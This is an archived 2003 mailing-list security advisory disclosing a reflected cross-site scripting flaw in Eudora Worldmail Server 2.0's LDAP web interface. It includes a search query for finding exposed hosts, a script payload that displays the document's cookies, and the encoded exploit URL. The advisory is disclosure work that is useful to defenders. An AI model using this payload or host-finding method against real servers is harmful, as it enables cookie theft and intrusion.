lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Law11-OE36RJ6xucduS0000844b@hotmail.com>
Date: Fri, 15 Aug 2003 15:34:58 -0700
From: "morning_wood" <se_cur_ity@...mail.com>
To: <full-disclosure@...ts.netsys.com>, <bugtraq@...urityfocus.com>
Subject: Eudora Worldmail Server 2.0 -XSS Injection


------------------------------------------------------------------
          - EXPL-A-2003-020 exploitlabs.com Advisory 020
------------------------------------------------------------------
                  -= Eudora Worldmail Server 2.0 =-





Donnie Werner
Aug 9, 2003


Product:
--------
Eudora Worldmail Server 2.0

http://www.qualcomm.com/
http://www.eudora.com/worldmail/



Vunerability(s):
----------------
1. XSS injection


Description of product:
-----------------------
http://www.eudora.com/worldmail/features.html


Banner id:

HTTP/1.0 200 Document follows
Server: ISOCOR web500gw 2.0.0.3
MIME-Version: 1.0
Date: Wednesday, 06-Aug-2003  GMT
Content-type: text/html


examples could be found by:

http://www.google.com/search?num=20&hl=en&lr=&ie=ISO-8859-1&newwindow=1&saf
e=off&q=Qpam.htm&btnG=Google+Search




VUNERABILITY / EXPLOIT
======================

Vunerable hosts display the following:

-------------- snip ----------------------

A convenient hypertext interface to LDAP and X.500 Directories.


Local domains and aliases
Results for: entries at the top level

 Name Description
Countries
 AE   <---------------- example country
 IT
 CA
--------------- snip --------------------

Select a country ( "AE" used as example )
you should see something like the following..

http://[host]:8888/c%3dAE

and a search box

"One-level search in AE:"

<FORM METHOD=GET ACTION="/c%3dAE">
<A NAME="search_form">One-level search in</A> <STRONG>AE</STRONG>:<br>
<INPUT NAME="?O" SIZE=39><INPUT TYPE=submit VALUE="Search">
<INPUT TYPE=reset VALUE="Clear"></FORM>

enter sum cool XSS...

<SCRIPT>alert(document.cookie);</SCRIPT>


and  get

http://[host]:8888/c%3dAE?%3FO=%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C
%2FSCRIPT%3E

the results are rendered by the output of the formatted html.

yes, it just a non persistant XSS, but this is running as a service on
port 8888 and is a mail processing server, so there may be other issues
( DoS ? ) as well.

I belive LDAP has some DCOM connectivity, and there could be issues
with the LDAP...

SLAPD or X.500 Error: Not found
An error occurred while searching the SLAPD or X.500 directory
The error code was 32:

No such object.
No additional information is available.Please report errors to the
Administrator.


Local:
------
???

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day


Vendor Contact:
---------------
Concurrent with this advisory
eudora-custserv@...lcomm.com

Credits:
--------

Donnie Werner
morning_wood@...labs.com
http://e2-labs.com

Original at
http://exploitlabs.com/files/advisories/EXPL-A-2003-020-eudora-worlmail-ser
ver.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ